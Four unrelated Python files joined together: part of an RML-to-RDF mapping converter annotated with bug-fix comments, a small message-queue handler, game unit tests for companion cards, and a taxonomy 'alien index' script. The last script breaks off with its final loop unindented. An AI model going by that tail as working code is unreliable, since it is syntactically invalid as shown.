    def get_join_conditions(self) -> List[Join]:
        return self.__joins

    def to_rdf(self) -> Graph:
        g = super().to_rdf()
        # BUGFIX: the original tested self.__child/self.__parent, attributes
        # that are never assigned on this class (they belong to Join), so this
        # method always raised AttributeError.  Emit the rr:parentTriplesMap
        # link whenever a parent mapping exists.
        if self.__parent_triples_map is not None:
            g.add((self._id, rml_vocab.PARENT_TRIPLES_MAP, self.__parent_triples_map.get_id()))
        return g

    def apply(self, df: DataFrame):
        """Return the parent subject-map representation for ``df``, first
        joining the parent logical source on the declared join conditions."""
        # BUGFIX: the original read self.__join, which is never assigned (the
        # constructor stores self.__joins), so this branch always raised
        # AttributeError.  Also generalized from a single join condition to
        # the whole list, mirroring the multi-column merge used elsewhere.
        if self.__joins:
            left_ons = [join.get_child().value for join in self.__joins]
            right_ons = [join.get_parent().value for join in self.__joins]
            ptm = RMLConverter.get_instance().get_mapping_dict().get(self.__parent_triples_map.get_id())
            right = ptm.get_logical_source().apply()
            df_1 = df.merge(right, how='inner', suffixes=("_l", "_r"), left_on=left_ons, right_on=right_ons, sort=False)
        else:
            df_1 = df
        return self.__parent_triples_map.get_subject_map().apply(df_1)

    def apply_(self, row):
        """Row-wise variant of apply(): delegate to the parent subject map
        (join filtering is handled upstream by TripleMappings)."""
        return self.__parent_triples_map.get_subject_map().apply_(row)

    @staticmethod
    def from_rdf(g: Graph, parent: Union[BNode, URIRef] = None) -> Set[TermMap]:
        """Collect the ReferencingObjectMaps declared in ``g`` (optionally only
        those attached to ``parent``), reusing cached parent triples maps."""
        term_maps = set()
        mappings_dict = RMLConverter.get_instance().get_mapping_dict()
        query = prepareQuery(
            """
            SELECT DISTINCT ?p ?parentTriples
            WHERE {
                ?p rr:parentTriplesMap ?parentTriples
            }""",
            initNs={"rr": rml_vocab.RR})
        if parent is not None:
            qres = g.query(query, initBindings={"p": parent})
        else:
            qres = g.query(query)
        # PERF: the join-condition query is loop-invariant; prepare it once
        # instead of once per result row (as the original did).
        query_join = prepareQuery(
            """
            SELECT DISTINCT ?join
            WHERE {
                ?p rr:joinCondition ?join
            }""",
            initNs={"rr": rml_vocab.RR})
        for row in qres:
            join_qres = g.query(query_join, initBindings={"p": row.p})
            joins = None
            for row_join in join_qres:
                if not joins:
                    joins = []
                joins.append(Join.from_rdf(g, row_join.join).pop())
            parent_triples = None
            if isinstance(row.parentTriples, URIRef):
                if row.parentTriples in mappings_dict:
                    parent_triples = mappings_dict.get(row.parentTriples)
                else:
                    mappings = TripleMappings.from_rdf(g, row.p)
                    if len(mappings) > 0:
                        parent_triples = mappings.pop()
                        mappings_dict.add(parent_triples)
            else:
                parent_triples = TripleMappings.from_rdf(g, row.p).pop()
            if parent_triples is not None:
                rmo = ReferencingObjectMap(parent_triples, joins, row.p)
                term_maps.add(rmo)
        return term_maps
class MappingsDict():
    """Registry of term maps keyed by their URIRef identifier.

    Only maps whose id is a URIRef are stored; blank-node identified maps are
    deliberately skipped by add() (they are not reusable keys).
    """
    def __init__(self):
        self.__dict = dict()
        # Keep a class-level handle to the most recently created registry.
        MappingsDict.__instance = self

    def __iter__(self):
        # BUGFIX: __next__ used to call self.__dict.__next__(), which does not
        # exist (plain dicts are iterable, not iterators) and always raised
        # AttributeError.  Track an explicit cursor so the class satisfies the
        # iterator protocol.  NOTE: as with any self-returning iterator,
        # nested concurrent iterations share the same cursor.
        self.__cursor = iter(self.__dict)
        return self

    def __next__(self):
        return next(self.__cursor)

    def add(self, term_map : TermMap):
        # Only URIRef-identified maps are cached.
        if isinstance(term_map.get_id(), URIRef):
            self.__dict.update( {term_map.get_id(): term_map} )

    def get(self, iri : URIRef):
        # Raises KeyError for unknown ids (plain dict semantics).
        return self.__dict[iri]
class TermUtils():
    """Static helpers turning row data + RML templates into RDF terms:
    {placeholder} substitution, %eval:...% function evaluation, and IRI
    sanitisation."""
    @staticmethod
    def urify(entity, row):
        # Literal templates are evaluated against the row and wrapped as a
        # URIRef; empty/None expansions become NaN so pandas dropna() later
        # removes the would-be triple.  Existing URIRefs pass through.
        # NOTE(review): any other term type falls through and returns None.
        if isinstance(entity, Literal):
            s = TermUtils.eval_functions(entity, row, True)
            if s is not None and s.strip() != '':
                return URIRef(s)
            else:
                return float('nan')
        elif isinstance(entity, URIRef):
            return entity
    @staticmethod
    def replace_place_holders(value, row, is_iri):
        """Substitute every {column} placeholder in ``value`` with the row's
        cell value (irified when ``is_iri`` is True).  Returns None when a
        referenced column is absent from the row; NaN cells expand to ''."""
        #p = re.compile('\{(.+)\/?\}')
        p = re.compile('(?<=\{).+?(?=\})')
        matches = p.finditer(value)
        #input_value = value
        s = value
        for match in matches:
            column = match.group(0)
            span = match.span(0)
            #span_start = span[0]-2
            #span_end = span[1]+1
            column_key = column.strip()
            if column_key in row:
                text = "{( )*" + column + "( )*}"
                # NaN != NaN: detects a missing cell and erases the placeholder.
                if row[column_key] != row[column_key]:
                    s = re.sub(text, '', s)
                else:
                    # NOTE(review): this "_l" suffix adjustment has no visible
                    # effect -- the lookup below uses ``column_key``, not
                    # ``column``.  Confirm the intended join-suffix handling.
                    if column not in row.index:
                        column += "_l"
                    cell_value = str(row[column_key])
                    '''
                    if span_start>0 and span_end<len(input_value):
                        if input_value[span_start] == '\'' and input_value[span_end] == '\'':
                            cell_value = cell_value.replace('\'', '\\\\\'')
                        elif input_value[span_start] == '"' and input_value[span_end] == '"':
                            cell_value = cell_value.replace('"', '\\\"')
                    '''
                    if is_iri:
                        value = TermUtils.irify(cell_value)
                    else:
                        value = cell_value
                    s = re.sub(text, value, s)
            else:
                return None
        #print(str(row[column]))
        return s
    @staticmethod
    def __eval_functions(text, row=None):
        # Delegates to the Lark-based expression parser.
        return EvalParser.parse(text, row)
    @staticmethod
    def get_functions(text, row=None):
        # Public alias of __eval_functions.
        return EvalParser.parse(text, row)
    @staticmethod
    def __eval_functions_old(text, row):
        """Legacy hand-rolled parser for registered function calls; superseded
        by EvalParser and apparently kept for reference only."""
        start = text.find("(")
        end = text.rfind(")")
        name = text[0:start].strip()
        if start > 0:
            body = TermUtils.__eval_functions(text[start+1:end].strip(), row)
            if RMLConverter.get_instance().has_registerd_function(name):
                fun = RMLConverter.get_instance().get_registerd_function(name)
                body_parts = body.split(",")
                args = []
                for body_part in body_parts:
                    body_part = body_part.strip()
                    # A bare "*" argument stands for the whole row.
                    if body_part == "*":
                        args.append(row)
                    else:
                        args.append(body_part)
                #if body_part != "*":
                #    args.append(body_part)
                #print("Args", args)
                #if body.endswith('*'):
                #    out = fun(*args, row)
                #else:
                #    out = fun(*args)
                out = fun(*args)
            else:
                out = None
            return out
        else:
            return text
    @staticmethod
    def eval_functions(value, row, is_iri):
        """Evaluate every %eval:expr% section of ``value`` against ``row``,
        then substitute the remaining {column} placeholders."""
        #p = re.compile('\{(.+)\/?\}')
        if value is not None:
            p = re.compile('(?<=\%eval:).+?(?=\%)')
            matches = p.finditer(value)
            s = value
            for match in matches:
                function = match.group(0)
                text = "%eval:" + function + "%"
                # Resolve placeholders inside the expression before evaluating.
                function = TermUtils.replace_place_holders(function, row, False)
                result = TermUtils.__eval_functions(function, row)
                if result is None:
                    result = ""
                s = s.replace(text, result)
            value = TermUtils.replace_place_holders(s, row, is_iri)
        return value
    @staticmethod
    def eval_template(template, row, is_iri):
        s = TermUtils.replace_place_holders(template, row, is_iri)
        # NOTE(review): eval(repr(s)) merely round-trips the string -- it
        # looks intended to decode escape sequences but is effectively a
        # no-op, and eval on template-derived text is risky.  Confirm intent.
        s = eval(repr(s))
        #print(s)
        return s
    @staticmethod
    def irify(string):
        '''
        The following regex pattern checks whether the input string is already
        a valid URI, e.g. http://dati.isprambiente.it/rmn/Ancona.jpg
        '''
        regex = re.compile(
            r'^(?:http|ftp)s?://' # http:// or https://
            r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)|' #domain...
            r'localhost|' #localhost...
            r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})' # ...or ip
            r'(?::\d+)?' # optional port
            r'(?:/?|[/?]\S+)$', re.IGNORECASE)
        '''
        In case the input sstring is not a valid URI than the function applies the irification (i.e. the transormation aimed at removing characters that prevent
        an IRI to be valid).
        '''
        # Transliterate to ASCII, lowercase, and strip/replace characters that
        # would make the IRI invalid.
        if re.match(regex, string) is None:
            string = unidecode.unidecode(string)
            string = string.lower();
            string = re.sub(r'[\']', '', string)
            #string = re.sub(r'[;.,&"???!]', '', string)
            string = re.sub(r'[;,&"???!]', '', string)
            string = re.sub(r'[ \/]', '_', string);
            string = re.sub(r'[\(\)]', '', string);
            string = re.sub(r'\-$', '', string);
            string = re.sub(r'(\-)+', '_', string);
            string = re.sub(r'(\_)+', '_', string);
        return string
class RMLParser():
    """Entry point turning an RML mapping document into TripleMappings objects."""

    @staticmethod
    def parse(source, format="ttl"):
        """Parse ``source`` (path or stream) as RDF in ``format`` and return
        the set of TripleMappings it declares.

        BUGFIX: marked @staticmethod -- the method is always invoked as
        ``RMLParser.parse(...)`` (see RMLConverter.convert); without the
        decorator an instance call would silently bind the instance as
        ``source``.
        """
        g = Graph('IOMemory')
        g.parse(source, format=format)
        return TripleMappings.from_rdf(g)
class RMLConverter():
    """Coordinates parsing an RML mapping and applying its triples mappings to
    produce an rdflib Graph.  Behaves as a process-wide singleton so worker
    processes and static helpers can reach the shared registries."""
    # Process-wide singleton handle; workers adopt it via initializer().
    __instance = None
    def __init__(self):
        self.__function_registry = dict()
        self.__mapping_dict = MappingsDict()
        self.__loaded_logical_sources = dict()
        self.subject_map_representations = dict()
        RMLConverter.__instance = self
    @staticmethod
    def get_instance():
        # May return None if no converter has been constructed yet.
        #if RMLConverter.__instance is None:
        #    RMLConverter.__instance = RMLConverter()
        return RMLConverter.__instance
    @staticmethod
    def set_instance(instance):
        # Used by multiprocessing workers to adopt the parent's converter.
        #if RMLConverter.__instance is None:
        #    RMLConverter.__instance = RMLConverter()
        RMLConverter.__instance = instance
    def convert(self, rml_mapping, multiprocessed=False, template_vars: Dict[str, str] = None) -> Graph:
        """Convert ``rml_mapping`` (path or stream) into an RDF Graph.

        rml_mapping: the RML document; when ``template_vars`` is given it is
            first rendered as a Jinja2 template with those variables.
        multiprocessed: when True, split the triples mappings across all CPU
            cores and merge the per-worker graphs at the end.
        """
        plugin.register("sparql", Result, "rdflib.plugins.sparql.processor", "SPARQLResult")
        plugin.register("sparql", Processor, "rdflib.plugins.sparql.processor", "SPARQLProcessor")
        if template_vars is not None:
            # Jinja2 FileSystemLoader needs a search path consistent with the
            # mapping path being absolute or relative.
            if os.path.isabs(rml_mapping):
                templates_searchpath = "/"
            else:
                templates_searchpath = "."
            file_loader = FileSystemLoader(templates_searchpath)
            env = Environment(loader=file_loader)
            template = env.get_template(rml_mapping)
            rml_mapping_template = template.render(template_vars)
            rml_mapping = StringInputSource(rml_mapping_template.encode('utf-8'))
        triple_mappings = RMLParser.parse(rml_mapping)
        g = Graph('IOMemory')
        if multiprocessed:
            processes = multiprocessing.cpu_count()
            tms = np.array_split(np.array(list(triple_mappings)), processes)
            pool = Pool(initializer=initializer, initargs=(RMLConverter.__instance,), processes=processes)
            graphs = pool.map(pool_map, tms)
            pool.close()
            pool.join()
            for graph in graphs:
                graph_add_all(g, graph)
        else:
            print("The RML mapping contains %d triple mappings."%len(triple_mappings))
            '''
            for tm in triple_mappings:
                subject_map_repr = tm.apply_subject_map()
                self.subject_map_representations.update({tm._id: subject_map_repr})
            for tm in triple_mappings:
                triples = tm.apply_()
                g = graph_add_all(g, triples)
            '''
            for tm in triple_mappings:
                triples = tm.apply_()
                g = graph_add_all(g, triples)
        return g
    def get_mapping_dict(self):
        # Shared registry of term maps keyed by URIRef.
        return self.__mapping_dict
    def register_function(self, name, fun):
        # NOTE(review): the "registerd" spelling below is part of the public
        # API surface and is therefore preserved.
        self.__function_registry.update({name: fun})
    def unregister_function(self, name):
        del self.__function_registry[name]
    def has_registerd_function(self, name):
        return name in self.__function_registry
    def get_registerd_function(self, name):
        return self.__function_registry.get(name)
    def get_loaded_logical_sources(self):
        return self.__loaded_logical_sources
def initializer(rml_converter):
    """Worker-process bootstrap: silence rdflib logging and install the
    parent's RMLConverter as this process's singleton."""
    rdflib_logger = logging.getLogger("rdflib")
    rdflib_logger.setLevel(logging.ERROR)
    rdflib_logger.disabled = True
    RMLConverter.set_instance(rml_converter)
def pool_map(triple_mappings):
    """Worker-side map function: apply each triples mapping and fold the
    resulting triples into a single Graph."""
    merged = Graph()
    for mapping in triple_mappings:
        graph_add_all(merged, mapping.apply())
    return merged
class EvalTransformer(Transformer):
    """Lark tree transformer that resolves registered functions and converts
    literal tokens into Python values."""

    def __init__(self, row=None):
        # Current data row, available while transforming an expression.
        self.__row = row

    def start(self, fun):
        return fun
        #return "%s(%s)"(fun[0],*fun[1])

    def f_name(self, name):
        # Resolve the function registered under the parsed name; the token is
        # replaced in place with the callable's qualified name.
        rml_converter = RMLConverter.get_instance()
        if rml_converter.has_registerd_function(name[0]):
            fun = rml_converter.get_registerd_function(name[0])
            name[0] = fun.__qualname__
            return fun
        return None

    def parameters(self, parameters):
        return parameters

    def paramvalue(self, param):
        return param[0]

    def row(self, val):
        # "*" is the placeholder meaning "pass the whole row".
        return '*'

    def string(self, val):
        # Strip the surrounding quote characters from the token.
        return val[0][1:-1]

    def placeholder(self, val):
        return val[0]

    def number(self, val):
        return val[0]

    def dec_number(self, val):
        return int(val[0])

    def hex_number(self, val):
        # BUGFIX: the originals called hex()/bin()/oct() on the token, but
        # those builtins require an int while Lark tokens are strings, so
        # they always raised TypeError.  Parse with the appropriate base
        # instead (int() accepts optional 0x/0b/0o prefixes).
        return int(val[0], 16)

    def bin_number(self, val):
        return int(val[0], 2)

    def oct_number(self, val):
        return int(val[0], 8)

    def float_number(self, val):
        return float(val[0])

    def imag_number(self, val):
        return complex(val[0])

    def const_true(self, val):
        return True

    def const_false(self, val):
        return False

    def const_none(self, val):
        return None
class EvalParser():
    """Shared wrapper around the Lark LALR parser for %eval:...% expressions."""
    # The grammar file lives next to this module and is loaded once at import
    # time; Lark parser instances are reusable across parse() calls.
    dirname = os.path.dirname(__file__)
    lark_grammar_file = os.path.join(dirname, 'grammar.lark')
    LARK = Lark.open(lark_grammar_file,parser='lalr')
    @staticmethod
    def parse(expr, row=None):
        # Parse the expression and evaluate it through EvalTransformer,
        # optionally binding the current data row.
        #logging.debug("Expr", expr)
        tree = EvalParser.LARK.parse(expr)
        return EvalTransformer(row).transform(tree)
|
#####################################
# Python Imports
#####################################
from quickscmp.bitstream import basic
from sys import path
#####################################
# Manakin Imports
#####################################
path.append('../')
from chaching import fileHandler
#####################################
# Node Queue Handler
#####################################
def handler(client, directory=None):
    '''
    (NodeRelay) -> None

    Distributes incoming messages to the proper whitelist, blacklist or
    pending text-files for the client.

    directory: location of the client's list files, forwarded to
        fileHandler.  NOTE(review): the original referenced an undefined
        global ``directory`` (guaranteed NameError); it is now an explicit
        parameter -- confirm the intended default with callers.
    '''
    fileHandler(directory)
    while True:
        if client.sizeOfQueue() > 0:
            # BUGFIX: the original constructed basic.Parser(message_received)
            # before ``message_received`` was ever assigned; the dequeued
            # bitstream is what must be parsed.
            bitstream_received = client.deQueue()
            parser = basic.Parser(bitstream_received)
            request = parser.getRequest()
            message_received = parser.getPrimaryData()
            message_sender = parser.getSecondaryData()
            if request == '4':
                pass
                # check if the sender is on the blacklist;
                # we will discard the message if they are on it
|
import random
from the_tale.common.utils import testcase
from the_tale.game.logic_storage import LogicStorage
from the_tale.game.logic import create_test_map
from the_tale.game.postponed_tasks import ComplexChangeTask
from the_tale.game.companions import storage as companions_storage
from the_tale.game.companions import logic as companions_logic
from the_tale.game.companions import relations as companions_relations
from the_tale.game.companions.tests import helpers as companions_helpers
from .. import cards
from .. import effects
from . import helpers
class GetCompanionCreateTests(testcase.TestCase):
    """GetCompanion card creation must never pick disabled or manually-managed
    companion records."""

    def setUp(self):
        super(GetCompanionCreateTests, self).setUp()
        create_test_map()

        self.account_1 = self.accounts_factory.create_account()

        self.storage = LogicStorage()
        self.storage.load_account_data(self.account_1)
        self.hero = self.storage.accounts_to_heroes[self.account_1.id]

        self.disabled_companion = companions_logic.create_random_companion_record('disbled')
        self.manual_companion = companions_logic.create_random_companion_record('manual', mode=companions_relations.MODE.MANUAL)

        self.effect = effects.GetCompanion(rarity=companions_relations.RARITY.COMMON)

    def test__no_disabled_companions(self):
        # 100 samples: a disabled record must never be chosen.
        for _ in range(100):
            card = self.effect.create_card(type=cards.CARD.GET_COMPANION_COMMON, available_for_auction=True)
            chosen_id = card.data['companion_id']
            self.assertNotEqual(chosen_id, self.disabled_companion.id)
            self.assertTrue(companions_storage.companions[chosen_id].state.is_ENABLED)

    def test__no_manual_companions(self):
        # 100 samples: a manually-managed record must never be chosen.
        for _ in range(100):
            card = self.effect.create_card(type=cards.CARD.GET_COMPANION_COMMON, available_for_auction=True)
            chosen_id = card.data['companion_id']
            self.assertNotEqual(chosen_id, self.manual_companion.id)
            self.assertTrue(companions_storage.companions[chosen_id].mode.is_AUTOMATIC)
class GetCompanionMixin(helpers.CardsTestMixin):
    """Shared scenarios for the rarity-specific GetCompanion card tests;
    concrete subclasses bind CARD to one card type."""
    CARD = None

    def setUp(self):
        super(GetCompanionMixin, self).setUp()
        create_test_map()

        self.account_1 = self.accounts_factory.create_account()

        self.storage = LogicStorage()
        self.storage.load_account_data(self.account_1)
        self.hero = self.storage.accounts_to_heroes[self.account_1.id]

        # One enabled automatic companion per rarity so any rarity can be granted.
        for rarity, rarity_abilities in companions_helpers.RARITIES_ABILITIES.items():
            companions_logic.create_random_companion_record('%s companion' % rarity,
                                                            mode=companions_relations.MODE.AUTOMATIC,
                                                            abilities=rarity_abilities,
                                                            state=companions_relations.STATE.ENABLED)

        self.card = self.CARD.effect.create_card(type=self.CARD, available_for_auction=True)

    def test_use(self):
        self.assertEqual(self.hero.companion, None)

        outcome = self.CARD.effect.use(**self.use_attributes(storage=self.storage, hero=self.hero, card=self.card))
        self.assertEqual(outcome, (ComplexChangeTask.RESULT.SUCCESSED, ComplexChangeTask.STEP.SUCCESS, ()))

        self.assertEqual(self.hero.companion.record.rarity.card_rarity, self.CARD.rarity)

    def test_use__companion_exists(self):
        # Give the hero a companion of a *different* rarity first.
        candidates = [companion
                      for companion in companions_storage.companions.all()
                      if companion.rarity.card_rarity != self.CARD.rarity]
        old_companion_record = random.choice(candidates)
        self.hero.set_companion(companions_logic.create_companion(old_companion_record))

        outcome = self.CARD.effect.use(**self.use_attributes(storage=self.storage, hero=self.hero, card=self.card))
        self.assertEqual(outcome, (ComplexChangeTask.RESULT.SUCCESSED, ComplexChangeTask.STEP.SUCCESS, ()))

        self.assertEqual(self.hero.companion.record.rarity.card_rarity, self.CARD.rarity)
        self.assertNotEqual(self.hero.companion.record.id, old_companion_record.id)

    def test_available(self):
        self.assertTrue(self.CARD.effect.available(self.CARD))

        # Disabling every companion of the card's rarity must make it unavailable.
        for companion in companions_storage.companions.all():
            if companion.rarity.card_rarity == self.CARD.rarity:
                companion.state = companions_relations.STATE.DISABLED

        self.assertFalse(self.CARD.effect.available(self.CARD))
# Concrete binding of the shared GetCompanion scenarios to the common-rarity card.
class GetCompanionCommonTests(GetCompanionMixin, testcase.TestCase):
    CARD = cards.CARD.GET_COMPANION_COMMON
# Concrete binding of the shared GetCompanion scenarios to the uncommon-rarity card.
class GetCompanionUncommonTests(GetCompanionMixin, testcase.TestCase):
    CARD = cards.CARD.GET_COMPANION_UNCOMMON
# Concrete binding of the shared GetCompanion scenarios to the rare-rarity card.
class GetCompanionRareTests(GetCompanionMixin, testcase.TestCase):
    CARD = cards.CARD.GET_COMPANION_RARE
# Concrete binding of the shared GetCompanion scenarios to the epic-rarity card.
class GetCompanionEpicTests(GetCompanionMixin, testcase.TestCase):
    CARD = cards.CARD.GET_COMPANION_EPIC
# Concrete binding of the shared GetCompanion scenarios to the legendary-rarity card.
class GetCompanionLegendaryTests(GetCompanionMixin, testcase.TestCase):
    CARD = cards.CARD.GET_COMPANION_LEGENDARY
|
#! /usr/bin/env python
import sys
import numpy as np
import time
usageMsg='''alienIndex.py
Calculate alien index (AI) for a Diamond output file that includes taxonomy info. MUST create using output format 6 command:
--outfmt 6 qseqid sseqid pident length mismatch gapopen qstart qend sstart send evalue evalue staxids sskingdoms skingdoms sphylums sscinames
Uses equation AI = (ln(bbhG + 1 * 10e-200)-ln(bbhO + 1 * 10e-200)) from Fan et al. (2020) Science Advances 6: eaba0111
AI ranges from approximately +/- 466, with AI > 0 if evalue higher in ingroup, < 0 if evalue higher in outgroup (So AI > 0 means query is more similar to outgroup than ingroup). Also reports raw numbers and percentage of hits that fell into ingroup/outgroup.'''
helpMsg='''
Required parameters
--ingroup, -i Name of taxonomic ingroup. Can be at any taxonomic level listed below. Set --taxon to search only a particular taxonomic level (use if ingroup name is shared among multiple taxonomic levels)
--file, -f Diamond output file with format specified above
Optional parameters
--outgroup, -g Specify outgroup. If not set, all sequences not in the ingroup are treated as outgroup. Set this if you want to leave a 'gap' between ingroup and outgroup.
--ignore, -n Specify clade within the ingroup to ignore. E.g. Ingroup is Eukaryota, but do not consider hits to Polypodiopsida.
--output, -o Name of output file. If not specified, output is printed to stdout
--missing, -m How to treat N/A taxonomic annotations. Available options: 'ignore' (default), 'outgroup', 'ingroup.
--help, -h Display full usage
--log, -l NOT ACTIVE. File to write log containing warnings generated and offending lines in BLAST file for debugging. Does not affect what is printed to STDOUT.
--taxon, -t Usually not necessary to set. Taxonomic level for ingroup. Available options: 'superkingdom' , 'kingdom', 'phylum', 'genus'
'''
# Walk the NCBI taxonomy upward from queryName until a name in the ingroup,
# outgroup, or ignore lists is found (or the root of all life is reached).
def parseTaxonomy(queryName, outgroupList, ingroupList, ignoregroupList):
    '''
    Classify queryName by climbing the taxonomy stored in the module-level
    dictionaries firstNodesDict (name -> [node, rank, parent]) and
    nodesDict (node -> [rank, name, parent]).

    Returns [queryName, ingroupCount, outgroupCount, ignoregroupCount,
    missingCount] where exactly one of the four counters is 1.
    '''
    currentName = queryName
    keyFound = False
    ingroupCount = 0
    outgroupCount = 0
    missingCount = 0
    ignoregroupCount = 0
    try:
        currentNode = firstNodesDict[queryName][0]
        currentRank = firstNodesDict[queryName][1]
        parentNode = firstNodesDict[queryName][2]
        keyFound = True
    except KeyError:
        # BUGFIX: the original assigned lowercase ``keyfound`` here, creating
        # a new, unused variable instead of updating ``keyFound`` (harmless
        # only because keyFound already starts False).
        keyFound = False
    if keyFound == False:
        # Unknown name: degrade to the root node and warn.
        currentNode = 1
        currentRank = "root"
        currentName = "root"
        parentNode = 1
        warning = "WARNING: %s not found in NCBI taxonomy" % (queryName)
        print(warning, file=sys.stderr)
        if 'logfile' in globals():
            global logfile
            logfile.write("WARNING: %s not found in NCBI taxonomy\n" % queryName)
    # Climb until a listed name is found, the root is reached, or the table ends.
    while currentName not in ingroupList and currentName not in outgroupList and currentName not in ignoregroupList:
        try:
            currentNode = parentNode
            currentRank = nodesDict[parentNode][0]
            currentName = nodesDict[parentNode][1]
            parentNode = nodesDict[parentNode][2]
            if currentNode == 1:
                # Reached the root without matching any listed name.
                break
            elif currentNode != 1 and currentNode == parentNode:
                # Defensive stop: a node that is its own parent would loop forever.
                break
        except KeyError:
            break
    if currentName in ingroupList:
        ingroupCount += 1
    elif currentName in outgroupList or len(outgroupList) == 0 and currentNode == 1:
        # NOTE(review): precedence here is ``A or (B and C)`` -- hits that
        # reach the root when no explicit outgroup was given are counted as
        # outgroup.  Confirm this matches the intended grouping.
        outgroupCount += 1
    elif currentName in ignoregroupList:
        ignoregroupCount += 1
    else:
        missingCount += 1
    return([queryName, ingroupCount, outgroupCount, ignoregroupCount, missingCount])
# Parse command line and set vars
if "-h" in sys.argv or "--help" in sys.argv:
    print(usageMsg)
    print(helpMsg)
    exit(1)
if "-i" not in sys.argv and "--ingroup" not in sys.argv:
    print("ERROR: Ingroup not specified")
    print(helpMsg)
    exit(1)
if "-f" not in sys.argv and "--file" not in sys.argv:
    print("ERROR: BLAST results file not specified")
    print(helpMsg)
    exit(1)
# NOTE(review): helpMsg documents 'ignore' as the default for --missing, but
# the code defaults to "outgroup" -- confirm which behaviour is intended.
if "-m" not in sys.argv and "--missing" not in sys.argv:
    missingData = "outgroup"
# Each flag's value is the argv element immediately following it.
for item in sys.argv:
    if "-i" == item or "--ingroup" == item:
        ingroup = sys.argv[sys.argv.index(item)+1]
        ingroupList = [ingroup]
    if "-f" == item or "--file" == item:
        infile = sys.argv[sys.argv.index(item)+1]
    if item in ["-o", "--output", "--out", "-out"]:
        outfile = sys.argv[sys.argv.index(item)+1]
    if "-t" == item or "--taxon" == item:
        taxonRank = sys.argv[sys.argv.index(item)+1]
        if taxonRank not in ['superkingdom' , 'kingdom', 'phylum', 'genus']:
            print("ERROR: Not an accepted taxonomic level")
            print(helpMsg)
            exit(1)
    if "-m" == item or "--missing" == item:
        missingData = sys.argv[sys.argv.index(item)+1]
        if missingData != "outgroup" and missingData != "ingroup" and missingData != "ignore":
            print("ERROR: Not an accepted missing data option")
            print(helpMsg)
            exit(1)
    if "-g" == item or "--outgroup" == item:
        # Outgroup / ignore lists are comma-separated taxon names.
        outgroupList = sys.argv[sys.argv.index(item)+1].split(",")
    if "-n" == item or "--ignore" == item:
        ignoregroupList = sys.argv[sys.argv.index(item)+1].split(",")
    if "-l" == item or "--log" == item:
        logfileName = sys.argv[sys.argv.index(item)+1]
        logfile = open(logfileName,"w")
# Default to empty lists when the optional groups were not supplied.
if 'outgroupList' not in locals():
    outgroupList = []
if 'ignoregroupList' not in locals():
    ignoregroupList = []
# Check that ingroup is actually in file - warn against spelling errors. Initiate extensive taxon search if any of the specified ingroup/outgroup/ignoregroup are missing from BLAST file
extensiveTaxonSearch = False
with open(infile) as openInfile:
    # Collect every taxon name appearing at the requested rank (or all ranks
    # when --taxon was not given) from the Diamond output columns 13-16.
    test_ingroup = []
    for line in openInfile:
        if 'taxonRank' in locals():
            if taxonRank == "superkingdom":
                for item in line.strip("\n").split("\t")[13].split(";"):
                    test_ingroup.append(item)
            elif taxonRank == "kingdom":
                for item in line.strip("\n").split("\t")[14].split(";"):
                    test_ingroup.append(item)
            elif taxonRank == "phylum":
                for item in line.strip("\n").split("\t")[15].split(";"):
                    test_ingroup.append(item)
            elif taxonRank == "genus":
                # Genus is taken as the first word of the scientific name.
                test_ingroup.append(line.strip("\n").split("\t")[16].split(" ")[0].split(";")[0])
        else:
            for x in line.strip("\n").split("\t")[13:16]:
                test_ingroup.append(x)
            test_ingroup.append(line.strip("\n").split("\t")[16].split(" ")[0].split(";")[0])
# Any requested group name missing from the file triggers the slow
# taxonomy-walking fallback below.
for ingroup in ingroupList:
    if ingroup.lower() not in [x.lower() for x in set(test_ingroup)]:
        extensiveTaxonSearch = True
if 'outgroupList' in locals():
    for outgroup in outgroupList:
        if outgroup.lower() not in [x.lower() for x in set(test_ingroup)]:
            extensiveTaxonSearch = True
if 'ignoregroupList' in locals():
    for ignoregroup in ignoregroupList:
        if ignoregroup.lower() not in [x.lower() for x in set(test_ingroup)]:
            extensiveTaxonSearch = True
if extensiveTaxonSearch == True:
    print("WARNING: Ingroup, outgroup, or ignoregroup not found in file. Will perform extensive (slow) taxon search.", file=sys.stderr)
    if 'taxonRank' in locals():
        print("Options for selected taxonomic level are: %s" % set(test_ingroup), file=sys.stderr)
# Create dictionary of taxonomic heirarchy (only if identifed as needed above)
if extensiveTaxonSearch == True:
    # NOTE(review): hard-coded absolute path to the blobtools nodes database;
    # consider making this configurable.
    nodesDB = "/home/ps997/bin/blobtools/data/nodesDB.txt"
    lineCount = 0
    nodesDictNamesList = []
    # nodesDict: node id -> [rank, name, parent id]; header line is skipped.
    nodesDict = {}
    with open(nodesDB, "r") as openNodesDB:
        for line in openNodesDB:
            lineCount += 1
            splitline = line.strip("\n").split("\t")
            if lineCount > 1:
                try:
                    nodesDict[splitline[0]] = [splitline[1],splitline[2],splitline[3]]
                    nodesDictNamesList.append(splitline[2])
                except:
                    print("ERROR on line %s of %s: Incorrectly formatted, must have 4 tab-separated columns" %(lineCount, nodesDB))
                    exit(1)
    # firstNodesDict: name -> [node id, rank, parent id] for fast name lookup.
    firstNodesDict = {}
    lineCount = 0
    with open(nodesDB, "r") as openNodesDB:
        for line in openNodesDB:
            lineCount += 1
            splitline = line.strip("\n").split("\t")
            if lineCount > 1:
                try:
                    firstNodesDict[splitline[2]] = [splitline[0],splitline[1],splitline[3]]
                except:
                    print("ERROR on line %s of %s: Incorrectly formatted, must have 4 tab-separated columns" %(lineCount, nodesDB))
                    exit(1)
####### Run #######
# Parse BLAST result file. In each line, use taxonomy info in columns 13,14,15,16 to determine if line is member of ingroup, outgroup, or neither.
# Creates dictionary with lowest evalue for ingroup and outgroup, and numbers of hits in ingroup and outgroup for each query sequence.
mainDict = {} # Structure: { qseqid1 : {"bestBlastHitIngroup" = line}, {"bestBlastHitOutgroup" = line}, {"AI" : NUM} }, {"numIngroup" : int}, {"numOutgroup" = int} } ; qseqid2...}
# First pass only counts lines so the main loop can report percent progress.
totalLines = 0
with open(infile, 'r') as openInfile:
    for line in openInfile:
        totalLines += 1
lineCount = 0
startTime = time.time()
with open(infile, 'r') as openInfile:
for line in openInfile:
lineCount += 1
percDone = float(lineCount/totalLines*100)
currentTime = time.time()
runTime = currentTime - startTime
linesPerSec = lineCount/runTime
sys.stderr.write("\r")
sys.stderr.write("Percent Complete: %0.2f\t\tAvg. speed: %0.2f lines/sec" % (percDone, linesPerSec))
sys.stderr.flush()
qseqid = line.split("\t")[0]
